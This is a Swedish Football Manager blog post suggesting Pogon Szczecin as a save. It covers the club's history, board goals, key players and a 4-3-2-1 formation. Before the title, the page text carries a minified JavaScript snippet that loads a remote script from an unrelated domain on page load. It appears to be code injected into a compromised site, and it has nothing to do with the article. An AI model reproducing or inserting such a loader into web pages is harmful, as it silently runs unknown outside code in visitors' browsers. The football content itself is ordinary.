;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veckans inspiration: Pogon Szczecin – FMSweden
Meny Stäng

Veckans inspiration: Pogon Szczecin

Denna vecka besöker vi ett lag som jag blir överraskad om någon av er hört talas om tidigare. Det rör sig nämligen om hamnarbetarna från Szczecin, eller Polens motsvarighet till Falkenberg om man så önskar (Laget vid havet). Pogon Szczecin har en förvånansvärt intressant historia, trots att klubben aldrig vunnit en enda titel sedan grundandet 1948. Som bäst har det blivit två andraplatser i den polska högstaligan Ekstraklasa och två finalförluster i den inhemska cupen. Säsongen 2000/01 blev de tvåa i ligan, men ekonomiskt var situationen desto sämre. De stod vid ruinens brant och supportrarna skapade till och med en egen klubb, som till en början agerade reservlag i fjärdedivisionen. A-laget fortsatte dock några år till, men genomgick en stor omvandling när de först bytte stad och sedan värvade ihop ett helt lag med brassar (det fanns inga regler som begränsade antalet utländska spelare). Till sist floppade projektet och föreningen lades ner och ersattes av fansens skapade förening istället. Efter tre uppflyttningar på fem år var Pogon tillbaka i högstaligan igen och har under det senaste decenniet varit ett stabilt mittenlag. I år har de dock tagit ytterligare steg och ligger tvåa bakom Legia Warszawa i tabellen, även om de tappat lite uppåt på sistone.

På FM är Pogon tippad sexa i ligan den första säsongen, så det borde finnas goda chanser att utmana bakom nämnda Legia och Lech Poznan. Styrelsen vill att du utvecklar egna spelare och spelar offensiv fotboll. I ligan är målet övre halvan, dvs. topp-8. En stor fördel är att klubben under 2022 flyttar in till en ny arena med en kapacitet på över 20 000 åskådare. Dessutom blir faciliteterna helt nya i samma veva, vilket lär bli en rejäl förbättring. Således finns förutsättningarna att utmana i toppen på längre sikt. I truppen finns svensken Pawel Cibicki, som tidigare spelat i bland annat Malmö FF och IF Elfsborg. Gorgon och Zahovic är vassa offensiva spelare som du kan bygga kring och innermittfältet är definitivt lagets styrka. Assisterande föreslår därför en julgransformation (4-3-2-1 smalt) vilket inte alls ser dumt ut sett till spelarmaterialet. Förvisso är flera spelare bäst som yttrar, men de flesta av dessa kan även spela MC/OMC/A så det borde funka ändå. Åldersmässigt befinner sig många spelare i sin “prime” mellan 24 och 29 år. Därför borde du kunna satsa direkt, men samtidigt se till att fylla på med yngre förmågor underifrån. Utmaningen blir förstås att vinna klubbens första titel genom tiderna, klarar du av det? Lycka till!

 

Pogon Szczecin logo.svg

Please wait...

Liknande Inlägg

Lämna ett svar